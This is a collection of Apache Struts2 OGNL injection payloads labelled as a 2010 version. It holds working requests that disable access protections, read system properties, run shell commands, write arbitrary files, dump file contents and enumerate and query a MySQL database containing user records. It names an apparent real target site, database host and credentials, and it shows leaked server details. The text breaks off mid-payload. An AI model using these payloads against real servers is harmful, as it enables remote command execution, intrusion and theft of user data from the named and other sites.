This is the 2010 version; for other versions, adapt it from this base. Further findings are welcome.
Web root physical path:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
java.version:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.name:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.arch:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.version:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
user.name:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
user.home:
Web root physical path:
java.home: \43req.getRealPath(%22\u005c%22)
java.version: @java.lang.System@getProperty(%22java.version%22)
os.name: @java.lang.System@getProperty(%22os.name%22)
os.arch: @java.lang.System@getProperty(%22os.arch%22)
os.version: @java.lang.System@getProperty(%22os.version%22)
user.name: @java.lang.System@getProperty(%22user.name%22)
user.home: /usr/share/jbossas
user.dir: /var/lib/jbossas/bin
java.class.version: 49.0
java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 1.5.0_13-b05
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.5
java.specification.vendor:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /tmp
Command execution
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls+-la
http://www.quam.net/index.action?request_locale=zh_TW&
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt
File upload request
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
POST
t=neirong&path=%2Ftmp%2Fhsmw.txt
For the POST version, just prepend an &.
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
&t=neirong&path=%2Ftmp%2Fhsmw.txt
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
&t=neirong&path=/tmp/hsmw.txt
Directory listing
Check readability; return value (true): @java.io.File@listRoots()[0].isDirectory()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))
Number of root directories: @java.io.File@listRoots().length
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))
First array element: @java.io.File@listRoots()[0]
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('\43xman.getWriter().close()')(d))
Array length: @java.io.File@listRoots()[0].listFiles().length
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))
First entry: @java.io.File@listRoots()[0].listFiles()[0].getName()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))
Second entry: @java.io.File@listRoots()[0].listFiles()[1].getName()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))
How to tell a file from a directory; return value (false): @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))
File size: @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('\43xman.getWriter().close()')(d))
Dump file contents
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))
—Database operations—
rs.absolute(1) is the first database
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the second database
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
And so on; stop when the returned value is empty. Database connection format, compared:
&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
&psw=<password>&user=<account>&clazz=<database type>&url=<database URL (mind the URL encoding)>
------
Database (table listing): the original statement gets one extra parameter, &db=<database name>
rs.absolute(1) is the first table
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the second table
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
------
Database (column listing): the original statement gets one extra parameter, &table=<table name>
rs.absolute(1) is the first column
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(1)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) is the second column
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(2)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
-----
Database (executing SQL): the original statement gets one extra parameter, &sql=select+count%28*%29+from+userinfos
Note: the data here goes via GET! POST doesn't work, oddly.
Count the columns of the query (example 1)
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
Count the columns of the query (example 2): a return value of 8 means 8 columns
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
Once 8 is confirmed, use rs.getMetaData().getColumnName(1), then rs.getMetaData().getColumnName(2), and so on through all 8 columns.
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
Output rows with rs.next(); the first row is a single rs.next()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%